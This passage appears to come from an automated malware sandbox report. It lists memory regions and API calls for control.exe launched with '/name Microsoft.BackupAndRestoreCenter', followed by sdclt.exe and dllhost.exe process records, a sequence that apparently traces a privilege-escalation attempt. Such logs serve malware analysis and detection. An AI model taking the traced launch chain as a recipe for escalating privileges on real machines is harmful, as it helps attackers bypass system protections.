= 1521 start_va = 0x7ff619260000 end_va = 0x7ff619280fff monitored = 1 entry_point = 0x7ff619261340 region_type = mapped_file name = "control.exe" filename = "\\Windows\\System32\\control.exe" (normalized: "c:\\windows\\system32\\control.exe") Region: id = 1522 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 1523 start_va = 0x4b0000 end_va = 0x5affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000004b0000" filename = "" Region: id = 1524 start_va = 0x7ff85cb80000 end_va = 0x7ff85cc2cfff monitored = 0 entry_point = 0x7ff85cb981a0 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\System32\\kernel32.dll" (normalized: "c:\\windows\\system32\\kernel32.dll") Region: id = 1525 start_va = 0x7ff859a20000 end_va = 0x7ff859c07fff monitored = 0 entry_point = 0x7ff859a4ba70 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\System32\\KernelBase.dll" (normalized: "c:\\windows\\system32\\kernelbase.dll") Region: id = 1526 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1527 start_va = 0x7df5ffec0000 end_va = 0x7df5fffbffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffec0000" filename = "" Region: id = 1528 start_va = 0x100000 end_va = 0x1bdfff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 1529 start_va = 0x7ff85bfd0000 end_va = 0x7ff85c076fff monitored = 0 entry_point = 0x7ff85bfe58d0 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\System32\\advapi32.dll" (normalized: "c:\\windows\\system32\\advapi32.dll") Region: id = 1530 start_va = 0x7ff85c360000 end_va = 0x7ff85c3fcfff monitored = 0 entry_point = 0x7ff85c3678a0 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\System32\\msvcrt.dll" (normalized: "c:\\windows\\system32\\msvcrt.dll") Region: id = 1531 start_va = 0x400000 end_va = 0x47ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000400000" filename = "" Region: id = 1532 start_va = 0x7ff85cc30000 end_va = 0x7ff85cc8afff monitored = 0 entry_point = 0x7ff85cc438b0 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\System32\\sechost.dll" (normalized: "c:\\windows\\system32\\sechost.dll") Region: id = 1533 start_va = 0x7ff85bea0000 end_va = 0x7ff85bfbbfff monitored = 0 entry_point = 0x7ff85bee02b0 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\System32\\rpcrt4.dll" (normalized: "c:\\windows\\system32\\rpcrt4.dll") Region: id = 1534 start_va = 0x7ff85bcb0000 end_va = 0x7ff85be05fff monitored = 0 entry_point = 0x7ff85bcba8d0 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\System32\\user32.dll" (normalized: "c:\\windows\\system32\\user32.dll") Region: id = 1535 start_va = 0x7ff85c560000 end_va = 0x7ff85c6e5fff monitored = 0 entry_point = 0x7ff85c5affc0 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\System32\\gdi32.dll" (normalized: "c:\\windows\\system32\\gdi32.dll") Region: id = 1536 start_va = 0x7ff85a4d0000 end_va = 0x7ff85a521fff monitored = 0 entry_point = 0x7ff85a4df530 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\System32\\shlwapi.dll" (normalized: "c:\\windows\\system32\\shlwapi.dll") Region: id = 1537 start_va = 0x7ff85cc90000 end_va = 0x7ff85cf0cfff monitored = 0 entry_point = 0x7ff85cd64970 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\System32\\combase.dll" (normalized: "c:\\windows\\system32\\combase.dll") Region: id = 1538 start_va = 0x20000 end_va = 0x26fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1539 start_va = 0x7ff85a2c0000 end_va = 0x7ff85a329fff monitored = 0 entry_point = 0x7ff85a2f6d50 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\System32\\bcryptprimitives.dll" (normalized: "c:\\windows\\system32\\bcryptprimitives.dll") Region: id = 1540 start_va = 0x7ff85a5a0000 end_va = 0x7ff85bafefff monitored = 0 entry_point = 0x7ff85a7011f0 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\System32\\shell32.dll" (normalized: "c:\\windows\\system32\\shell32.dll") Region: id = 1541 start_va = 0x7ff85a3c0000 end_va = 0x7ff85a402fff monitored = 0 entry_point = 0x7ff85a3d4b50 region_type = mapped_file name = "cfgmgr32.dll" filename = "\\Windows\\System32\\cfgmgr32.dll" (normalized: "c:\\windows\\system32\\cfgmgr32.dll") Region: id = 1542 start_va = 0x7ff859c70000 end_va = 0x7ff85a2b3fff monitored = 0 entry_point = 0x7ff859e364b0 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\System32\\windows.storage.dll" (normalized: "c:\\windows\\system32\\windows.storage.dll") Region: id = 1543 start_va = 0x7ff859720000 end_va = 0x7ff85972efff monitored = 0 entry_point = 0x7ff859723210 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\System32\\kernel.appcore.dll" (normalized: "c:\\windows\\system32\\kernel.appcore.dll") Region: id = 1544 start_va = 0x7ff85a410000 end_va = 0x7ff85a4c4fff monitored = 0 entry_point = 0x7ff85a4522e0 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\System32\\SHCore.dll" (normalized: "c:\\windows\\system32\\shcore.dll") Region: id = 1545 start_va = 0x7ff859730000 end_va = 0x7ff85977afff monitored = 0 entry_point = 0x7ff8597335f0 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\System32\\powrprof.dll" (normalized: "c:\\windows\\system32\\powrprof.dll") Region: id = 1546 start_va = 0x7ff859700000 end_va = 0x7ff859713fff monitored = 0 entry_point = 0x7ff8597052e0 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\System32\\profapi.dll" (normalized: "c:\\windows\\system32\\profapi.dll") Region: id = 1547 start_va = 0x5b0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1548 start_va = 0x1c0000 end_va = 0x1c6fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 1549 start_va = 0x5b0000 end_va = 0x5e8fff monitored = 0 entry_point = 0x5b12f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1550 start_va = 0x6f0000 end_va = 0x6fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000006f0000" filename = "" Region: id = 1551 start_va = 0x700000 end_va = 0x887fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000700000" filename = "" Region: id = 1552 start_va = 0x7ff85d090000 end_va = 0x7ff85d0cafff monitored = 0 entry_point = 0x7ff85d0912f0 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\System32\\imm32.dll" (normalized: "c:\\windows\\system32\\imm32.dll") Region: id = 1553 start_va = 0x890000 end_va = 0xa10fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000890000" filename = "" Region: id = 1554 start_va = 0xa20000 end_va = 0x1e1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000a20000" filename = "" Region: id = 1555 start_va = 0x1d0000 end_va = 0x1d0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001d0000" filename = "" Region: id = 1556 start_va = 0x1e0000 end_va = 0x1e0fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000001e0000" filename = "" Region: id = 1557 start_va = 0x5b0000 end_va = 0x68cfff monitored = 0 entry_point = 0x60e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1558 start_va = 0x7ff858070000 end_va = 0x7ff858105fff monitored = 0 entry_point = 0x7ff858095570 region_type = mapped_file name = "uxtheme.dll" filename = "\\Windows\\System32\\uxtheme.dll" (normalized: "c:\\windows\\system32\\uxtheme.dll") Region: id = 1559 start_va = 0x1e20000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1560 start_va = 0x1f0000 end_va = 0x1f0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001f0000" filename = "" Region: id = 1561 start_va = 0x7ff85c080000 end_va = 0x7ff85c126fff monitored = 0 entry_point = 0x7ff85c08b4d0 region_type = mapped_file name = "clbcatq.dll" filename = "\\Windows\\System32\\clbcatq.dll" (normalized: "c:\\windows\\system32\\clbcatq.dll") Region: id = 1562 start_va = 0x480000 end_va = 0x480fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 1563 start_va = 0x490000 end_va = 0x490fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000490000" filename = "" Region: id = 1564 start_va = 0x7ff85c410000 end_va = 0x7ff85c552fff monitored = 0 entry_point = 0x7ff85c438210 region_type = mapped_file name = "ole32.dll" filename = "\\Windows\\System32\\ole32.dll" (normalized: "c:\\windows\\system32\\ole32.dll") Region: id = 1565 start_va = 0x5b0000 end_va = 0x66ffff monitored = 0 entry_point = 0x5d0da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1566 start_va = 0x1f70000 end_va = 0x22a6fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "sortdefault.nls" filename = "\\Windows\\Globalization\\Sorting\\SortDefault.nls" (normalized: "c:\\windows\\globalization\\sorting\\sortdefault.nls") Region: id = 1567 start_va = 0x7ff85c130000 end_va = 0x7ff85c1f0fff monitored = 0 entry_point = 0x7ff85c150da0 region_type = mapped_file name = "oleaut32.dll" filename = "\\Windows\\System32\\oleaut32.dll" (normalized: "c:\\windows\\system32\\oleaut32.dll") Region: id = 1568 start_va = 0x5b0000 end_va = 0x68cfff monitored = 0 entry_point = 0x60e0b0 region_type = mapped_file name = "rpcss.dll" filename = "\\Windows\\System32\\rpcss.dll" (normalized: "c:\\windows\\system32\\rpcss.dll") Region: id = 1569 start_va = 0x5b0000 end_va = 0x62ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000005b0000" filename = "" Region: id = 1570 start_va = 0x630000 end_va = 0x6affff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000630000" filename = "" Region: id = 1571 start_va = 0x1e20000 end_va = 0x1e9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001e20000" filename = "" Region: id = 1572 start_va = 0x1f60000 end_va = 0x1f6ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000001f60000" filename = "" Region: id = 1573 start_va = 0x7ff856dc0000 end_va = 0x7ff857252fff monitored = 0 entry_point = 0x7ff856dcf760 region_type = mapped_file name = "actxprxy.dll" filename = "\\Windows\\System32\\actxprxy.dll" (normalized: "c:\\windows\\system32\\actxprxy.dll") Region: id = 1665 start_va = 0x7ff857c10000 end_va = 0x7ff857d95fff monitored = 0 entry_point = 0x7ff857c5d700 region_type = mapped_file name = "propsys.dll" filename = "\\Windows\\System32\\propsys.dll" (normalized: "c:\\windows\\system32\\propsys.dll") Region: id = 1666 start_va = 0x4a0000 end_va = 0x4a3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1667 start_va = 0x1ea0000 end_va = 0x1ee4fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{6AF0698E-D558-4F6E-9B3C-3716689AF493}.2.ver0x0000000000000005.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{6af0698e-d558-4f6e-9b3c-3716689af493}.2.ver0x0000000000000005.db") Region: id = 1668 start_va = 0x6b0000 end_va = 0x6b3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.2.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\cversions.2.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\cversions.2.db") Region: id = 1669 start_va = 0x22b0000 end_va = 0x233dfff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db" filename = "\\ProgramData\\Microsoft\\Windows\\Caches\\{DDF571F2-BE98-426D-8288-1A9A39C3FDA2}.2.ver0x0000000000000001.db" (normalized: "c:\\programdata\\microsoft\\windows\\caches\\{ddf571f2-be98-426d-8288-1a9a39c3fda2}.2.ver0x0000000000000001.db") Region: id = 1670 start_va = 0x7ff85cf10000 end_va = 0x7ff85cf7afff monitored = 0 entry_point = 0x7ff85cf290c0 region_type = mapped_file name = "ws2_32.dll" filename = "\\Windows\\System32\\ws2_32.dll" (normalized: "c:\\windows\\system32\\ws2_32.dll") Region: id = 1671 start_va = 0x2340000 end_va = 0x23bffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002340000" filename = "" Region: id = 1672 start_va = 0x6c0000 end_va = 0x6c1fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006c0000" filename = "" Region: id = 1673 start_va = 0x6d0000 end_va = 0x6d0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000006d0000" filename = "" Region: id = 1674 start_va = 0x23c0000 end_va = 0x27bafff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000023c0000" filename = "" Region: id = 1675 start_va = 0x6e0000 end_va = 0x6e7fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "windows.storage.dll.mui" filename = "\\Windows\\System32\\en-US\\windows.storage.dll.mui" (normalized: "c:\\windows\\system32\\en-us\\windows.storage.dll.mui") Region: id = 1676 start_va = 0x7ff843820000 end_va = 0x7ff8438c9fff monitored = 0 entry_point = 0x7ff843857c30 region_type = mapped_file name = "structuredquery.dll" filename = "\\Windows\\System32\\StructuredQuery.dll" (normalized: "c:\\windows\\system32\\structuredquery.dll") Region: id = 1677 start_va = 0x1ef0000 end_va = 0x1ef3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.3.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.3.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.3.db") Region: id = 1678 start_va = 0x27c0000 end_va = 0x2822fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{286dd990-b905-4d30-88c9-b63c603da134}.3.ver0x0000000000000001.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{286DD990-B905-4D30-88C9-B63C603DA134}.3.ver0x0000000000000001.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{286dd990-b905-4d30-88c9-b63c603da134}.3.ver0x0000000000000001.db") Region: id = 1679 start_va = 0x2830000 end_va = 0x292ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002830000" filename = "" Region: id = 1680 start_va = 0x7ff84f7b0000 end_va = 0x7ff84f7f7fff monitored = 0 entry_point = 0x7ff84f7bc0e0 region_type = mapped_file name = "mswb7.dll" filename = "\\Windows\\System32\\MSWB7.dll" (normalized: "c:\\windows\\system32\\mswb7.dll") Region: id = 1681 start_va = 0x2930000 end_va = 0x2b2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000002930000" filename = "" Region: id = 1682 start_va = 0x2b30000 end_va = 0x30aafff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "prm0009.dll" filename = "\\Windows\\System32\\prm0009.dll" (normalized: "c:\\windows\\system32\\prm0009.dll") Region: id = 1683 start_va = 0x7ff843750000 end_va = 0x7ff84381bfff monitored = 0 entry_point = 0x7ff84378e390 region_type = mapped_file name = "windows.storage.search.dll" filename = "\\Windows\\System32\\Windows.Storage.Search.dll" (normalized: "c:\\windows\\system32\\windows.storage.search.dll") Region: id = 1700 start_va = 0x7ff84f7a0000 end_va = 0x7ff84f7affff monitored = 0 entry_point = 0x7ff84f7a3d50 region_type = mapped_file name = "pcacli.dll" filename = "\\Windows\\System32\\pcacli.dll" (normalized: "c:\\windows\\system32\\pcacli.dll") Region: id = 1701 start_va = 0x7ff84cf20000 end_va = 0x7ff84cf3afff monitored = 0 entry_point = 0x7ff84cf21040 region_type = mapped_file name = "mpr.dll" filename = "\\Windows\\System32\\mpr.dll" (normalized: "c:\\windows\\system32\\mpr.dll") Region: id = 1702 start_va = 0x7ff858e50000 end_va = 0x7ff858e6efff monitored = 0 entry_point = 0x7ff858e55d30 region_type = mapped_file name = "userenv.dll" filename = "\\Windows\\System32\\userenv.dll" (normalized: "c:\\windows\\system32\\userenv.dll") Region: id = 1703 start_va = 0x1ef0000 end_va = 0x1ef3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1704 start_va = 0x1f00000 end_va = 0x1f16fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{AFBF9F1A-8EE8-4C77-AF34-C647E37CA0D9}.1.ver0x000000000000000d.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{afbf9f1a-8ee8-4c77-af34-c647e37ca0d9}.1.ver0x000000000000000d.db") Region: id = 1705 start_va = 0x1f20000 end_va = 0x1f20fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001f20000" filename = "" Region: id = 1714 start_va = 0x1ef0000 end_va = 0x1ef3fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "cversions.1.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\cversions.1.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\cversions.1.db") Region: id = 1715 start_va = 0x1f30000 end_va = 0x1f48fff monitored = 1 entry_point = 0x0 region_type = mapped_file name = "{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000010.db" filename = "\\Users\\RDhJ0CNFevzX\\AppData\\Local\\Microsoft\\Windows\\Caches\\{3DA71D5A-20CC-432F-A115-DFE92379E91F}.1.ver0x0000000000000010.db" (normalized: "c:\\users\\rdhj0cnfevzx\\appdata\\local\\microsoft\\windows\\caches\\{3da71d5a-20cc-432f-a115-dfe92379e91f}.1.ver0x0000000000000010.db") Region: id = 1716 start_va = 0x7ff857260000 end_va = 0x7ff8572c6fff monitored = 0 entry_point = 0x7ff85727e710 region_type = mapped_file name = "bcp47langs.dll" filename = "\\Windows\\System32\\BCP47Langs.dll" (normalized: "c:\\windows\\system32\\bcp47langs.dll") Region: id = 1738 start_va = 0x1ef0000 end_va = 0x1ef0fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000001ef0000" filename = "" Thread: id = 42 os_tid = 0xf30 [0281.516] GetStartupInfoW (in: lpStartupInfo=0xcfee0 | out: lpStartupInfo=0xcfee0*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\control.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0281.516] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff619260000 [0281.516] __set_app_type (_Type=0x2) [0281.516] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x7ff6192615f0) returned 0x0 [0281.516] __getmainargs (in: _Argc=0x7ff619265028, _Argv=0x7ff619265030, _Env=0x7ff619265038, _DoWildCard=0, _StartInfo=0x7ff619265044 | out: _Argc=0x7ff619265028, _Argv=0x7ff619265030, _Env=0x7ff619265038) returned 0 [0281.517] GetCommandLineW () returned="\"C:\\Windows\\System32\\control.exe\" /name Microsoft.BackupAndRestoreCenter" [0281.517] StrTrimW (in: psz=" /name Microsoft.BackupAndRestoreCenter", pszTrimChars=" \x09" | out: psz="/name Microsoft.BackupAndRestoreCenter") returned 1 [0281.517] GetStartupInfoW (in: lpStartupInfo=0xcfe20 | out: lpStartupInfo=0xcfe20*(cb=0x68, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\System32\\control.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x401, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x10001, hStdError=0x0)) [0281.517] GetModuleHandleW (lpModuleName=0x0) returned 0x7ff619260000 [0281.518] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0281.518] StrCmpICW (pszStr1="/name Microsoft.BackupAndRestoreCenter", pszStr2="PANEL") returned -65 [0281.518] CoTaskMemAlloc (cb=0x4e) returned 0x4b8110 [0281.518] StrCmpICW (pszStr1="/name", pszStr2="/name") returned 0 [0281.518] CoTaskMemFree (pv=0x4b8110) [0281.518] CoInitializeEx (pvReserved=0x0, dwCoInit=0x2) returned 0x0 [0281.566] CoCreateInstance (in: rclsid=0x7ff619263268*(Data1=0x6622d85, Data2=0x6856, Data3=0x4460, Data4=([0]=0x8d, [1]=0xe1, [2]=0xa8, [3]=0x19, [4]=0x21, [5]=0xb4, [6]=0x1c, [7]=0x4b)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7ff619263278*(Data1=0xd11ad862, Data2=0x66de, Data3=0x4df4, Data4=([0]=0xbf, [1]=0x6c, [2]=0x1f, [3]=0x56, [4]=0x21, [5]=0x99, [6]=0x6a, [7]=0xf1)), ppv=0xcf230 | out: ppv=0xcf230*=0x4cd110) returned 0x0 [0281.576] OpenControlPanel:IOpenControlPanel:Open (This=0x4cd110, pszName="Microsoft.BackupAndRestoreCenter", pszPage=0x0, punkSite=0x0) returned 0x0 [0284.445] OpenControlPanel:IUnknown:Release (This=0x4cd110) returned 0x0 [0284.445] CoUninitialize () [0284.469] CoTaskMemFree (pv=0x0) [0284.469] exit (_Code=1) Thread: id = 43 os_tid = 0xf3c Thread: id = 44 os_tid = 0xf40 Thread: id = 45 os_tid = 0xf44 Thread: id = 46 os_tid = 0xf48 Thread: id = 56 os_tid = 0xf9c Process: id = "12" image_name = "sdclt.exe" filename = "c:\\windows\\system32\\sdclt.exe" page_root = "0x7e39000" os_pid = "0xf94" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "7" os_parent_pid = "0xdd8" cmd_line = "\"C:\\Windows\\system32\\sdclt.exe\" " cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1574 start_va = 0x10000 end_va = 0x2ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 1575 start_va = 0x30000 end_va = 0x44fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1576 start_va = 0x50000 end_va = 0xcffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000050000" filename = "" Region: id = 1577 start_va = 0xd0000 end_va = 0xd3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000d0000" filename = "" Region: id = 1578 start_va = 0xe0000 end_va = 0xe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1579 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1580 start_va = 0x200000 end_va = 0x3fffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000200000" filename = "" Region: id = 1581 start_va = 0x7ffe0000 end_va = 0x7ffeffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 1582 start_va = 0x7df5fffc0000 end_va = 0x7df5fffe2fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5fffc0000" filename = "" Region: id = 1583 start_va = 0x7df5ffff0000 end_va = 0x7ff5fffeffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00007df5ffff0000" filename = "" Region: id = 1584 start_va = 0x7ff7c9cb0000 end_va = 0x7ff7c9ddffff monitored = 0 entry_point = 0x7ff7c9d28660 region_type = mapped_file name = "sdclt.exe" filename = "\\Windows\\System32\\sdclt.exe" (normalized: "c:\\windows\\system32\\sdclt.exe") Region: id = 1585 start_va = 0x7ff85d0d0000 end_va = 0x7ff85d290fff monitored = 0 entry_point = 0x0 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Thread: id = 55 os_tid = 0xf98 Process: id = "13" image_name = "dllhost.exe" filename = "c:\\windows\\syswow64\\dllhost.exe" page_root = "0x3a034000" os_pid = "0xf54" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "rpc_server" parent_id = "11" os_parent_pid = "0x274" cmd_line = "C:\\Windows\\SysWOW64\\DllHost.exe /Processid:{06622D85-6856-4460-8DE1-A81921B41C4B}" cur_dir = "C:\\Windows\\system32\\" os_username = "XC64ZB\\RDhJ0CNFevzX" bitness = "32" os_groups = "XC64ZB\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00015c7b" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 1586 start_va = 0x10000 end_va = 0x1ffff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 1587 start_va = 0x20000 end_va = 0x23fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 1588 start_va = 0x30000 end_va = 0x30fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000030000" filename = "" Region: id = 1589 start_va = 0x40000 end_va = 0x54fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 1590 start_va = 0x60000 end_va = 0x9ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 1591 start_va = 0xa0000 end_va = 0xdffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 1592 start_va = 0xe0000 end_va = 0xe3fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000000e0000" filename = "" Region: id = 1593 start_va = 0xf0000 end_va = 0xf1fff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x00000000000f0000" filename = "" Region: id = 1594 start_va = 0x100000 end_va = 0x13ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000100000" filename = "" Region: id = 1595 start_va = 0x140000 end_va = 0x17ffff monitored = 1 entry_point = 0x0 region_type = private name = "private_0x0000000000140000" filename = "" Region: id = 1596 start_va = 0x180000 end_va = 0x180fff monitored = 1 entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000180000" filename = "" Region: id = 1597 start_va = 0x190000 end_va = 0x190fff monitored = 1 entry_point = 0x0 region_type = private name = 